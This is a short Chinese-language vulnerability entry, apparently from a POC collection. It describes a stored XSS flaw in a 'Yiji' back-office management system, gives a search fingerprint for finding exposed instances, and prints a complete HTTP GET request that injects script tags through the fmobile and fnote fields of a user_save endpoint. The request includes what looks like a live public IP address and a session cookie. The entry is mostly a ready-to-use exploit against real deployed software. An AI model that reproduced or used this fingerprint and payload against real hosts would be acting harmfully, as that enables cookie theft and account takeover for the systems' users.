漏洞描述
沂机管理系统存在存储型XSS漏洞,窃取用户Cookie获取用户信息
漏洞复现
body="后台管理系统演示版"
POC
GET /data/Ajax.aspx?method=user_save&frandom=0.15233733802978144&FCloud_OrgID=1&FCloud_UserID=167636&FCloud_EmpID=110243&froleid=105&fid=1319&fnumber=liuzk&fname=%E5%88%98%E6%8C%AF%E7%A7%91&fmobile=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fnote=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/user.aspx?fid=1319&moduleid=101&frandom=0.4487488038893439
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive
成功弹窗